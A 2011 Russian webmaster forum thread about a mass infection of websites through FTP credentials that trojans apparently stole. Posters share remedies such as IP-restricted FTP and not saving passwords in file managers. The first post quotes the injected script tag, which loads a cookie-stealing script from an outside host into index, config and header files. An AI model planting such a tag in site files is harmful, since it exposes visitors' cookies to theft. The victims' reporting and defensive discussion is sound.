Попробуйте ставить вход на фтп с других IP адресов - Самые разные темы

Массовый взлом и заражение сайтов

mymind · 2011-08-09T10:47:30.0000000Z

Обнаружил сегодня заражение своих сайтов. По возможности везде прописывалась строка: <script src="http://yourerating.com/cookiesave.js"></script> Начал срочно менять пароли на FTP (а это не просто) и убирать последствия. Полез в сеть по поводу этого явления и ничего не нашёл. Пусто. Собственно на акаунте робот пробегается по всем файлам и заражает в основном index.php (htm) файлы, а также config.php, header.php, footer.php, auth.php и т.д. также возможно index.htm, main.htm и похожее Если на сайте стоит какой-то популярный движок ( Joomla, WordPress, phpBB и т.д. ) то тут заражение идёт полным ходом, причём согласно архитектуре самого движка. Интегрирует код очень аккуратно, работоспособность сайтов не теряется. Благо у меня все сайты самописные, поэтому аккуратно влезть не получилось. Срочно начал устранять последствия. В некоторых случаях откат на 7 августа, в некоторых пришлось руками. Пока делал лазал по сети искал информацию. И только час назад начала появляться инфа, что заражаются сайты. Теперь любопытное. Затронуты были аккаунты которым более 2-3 месяц. Те аккаунты, которые я добавлял в Total Commander ( а на свою безбожную глупость сохранял пароли от ftp именно в нём) месяц 1 - 1,5 назад затронуты не были. Сайты были чисты и невинны. Предположу, что с месяца 2 назад был сбор ftp аккаунтов троянами (одним или нескольким). Как раз в тот период я только у себя ловил по трояну через каждые 3 дня, которые ни один антивирь не ощущал. Только после отправки в лаборатории со следующим обновлением антивирусы видели эту заразу. Затем похоже был период подготовки. И сейчас началась активная проработка собранной базы. По датам файлы изменялись 8-го августа и 9-го (т.е. буквально сегодня). Ну и надо отдать должное создателям этой заразы, что проработали они всё на славу. Внедрённый код не мешает работоспособности большинству сайтов. Я и по своим-то узнал случайно, когда сайты с GZIP архивацией стали выдавать ошибки. Грешил на хостинг, но когда полез узнавать волосы даже подмышками зашевелились. Будем наблюдать за ситуацией, но судя по тому, что местами стали появляться люди с это проблемой возможно это только начало.

11

_LS_

10 августа 2011, 15:58

#31

mymind:
Вирусы вроде пока не распространяются, походу тянут Куки со всех пользователей.

Зашел на один из сайтов, увидел это:

[ATTACH]94579[/ATTACH]

А в гугле было:

[ATTACH]94580[/ATTACH]

jpg 1.jpg

jpg 2.jpg

Блог http://lexas0ft.ru (http://lexas0ft.ru)

R

180

Алексей

10 августа 2011, 16:31

#32

Стучите поможем, смотреть подпись

Удаление вирусов с сайта, защита сайта, Гарантия! ( /ru/forum/999073 ) -> топик на маулталк ( http://www.maultalk.com/topic113834s0.html ) -> Топик в сапе ( http://forum.sape.ru/showthread.php?t=79363 ). TELEGRAM - https://t.me/Doktorsaitov

675

vandamme

10 августа 2011, 16:37

#33

а в антивирусе не пробовали ставить вход на фтп только с вашего IP?

162

Mad_Man

10 августа 2011, 16:39

#34

vandamme:
а в антивирусе не пробовали ставить вход на фтп только с вашего IP?

В каком ещё антивирусе? :D

675

vandamme

10 августа 2011, 17:01

#35

Mad_Man, ну в файрволе, я особо не разбираюсь

413

angr

10 августа 2011, 18:43

#36

vandamme:
а в антивирусе не пробовали

vandamme, если троян уже на машине, антивирус его не обнаружил, то толку от запрета нет...

указания валидного IP для доступа по фтп, даётся серверу, а не вашей машине...

Требуется СЕО-Специалист в Кишиневе, в офис. ()

675

vandamme

10 августа 2011, 18:44

#37

angr:
указания валидного IP для доступа по фтп, даётся серверу, а не вашей машине...

ну так я за это и говорил, в ispmanager есть такая функция

A

179

askary

10 августа 2011, 21:01

#38

да, лучше популярными фтп клиентами не пользоваться. у самого когда-то взламывали сайты какими-то албанскими троянами каждый раз после того как тоталом заходил. лучше использовать winscp, например, он и шифрованное соединение поддерживает

В счетчике Яндекс.Метрики появился Google назвал 100 самых Яндекс Браузер продолжает поддерживать

188

mymind

10 августа 2011, 23:57

#39

greenlen:
То есть как? Фаерволы уже ведь получили данные.

Не все. Была попытка входа с других IP адресов. Благо пароли уже сменены, попытка не удалась. Однако долбились черти.

_LS_:
Зашел на один из сайтов, увидел это

Весело однако. Видимо неделю заражались сайты, а затем код подменили на вирус. А я уже теории стал строить куда это и зачем это.

Yahoo! Japan: данные 22 Роскомнадзор активизировал блокировку мессенджера Microsoft вернула российским пользователям

56

Teimos

11 августа 2011, 03:08

#40

Пользуюсь файлзиллой, но заражение произошло только на одном сервере из пяти. Что странно.

Подбор дроп-доменов и доменов с историей (http://goo.gl/SiFXt)

Что такое Power BI и зачем это нужно бизнесу

В 2023 году 36,9% всех DDoS-атак пришлось на сферу финансов

Массовый взлом и заражение сайтов